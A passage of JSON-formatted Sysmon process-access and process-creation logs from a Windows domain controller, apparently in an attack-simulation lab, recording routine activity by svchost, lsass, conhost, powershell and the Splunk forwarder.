06:55:00.459","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4978,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.459\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-001043D90600}\r\nSourceProcessId: 4776\r\nSourceThreadId: 1092\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001067DC0600}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.459","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001043D90600}","SourceProcessId":"4776","SourceThreadId":"1092","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001067DC0600}","TargetProcessId":"1164","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4979,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.459\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.459","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4980,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.459\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.459","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4981,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.459\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 3916\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.459","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4982,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.476\r\nProcessGuid: {E2A3D6B1-11C4-5F25-0000-001036DE0600}\r\nProcessId: 4852\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.476","ProcessGuid":"{E2A3D6B1-11C4-5F25-0000-001036DE0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4983,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.475\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001036DE0600}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.475","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001036DE0600}","TargetProcessId":"4852","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4984,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.475\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001036DE0600}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.475","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001036DE0600}","TargetProcessId":"4852","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4985,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
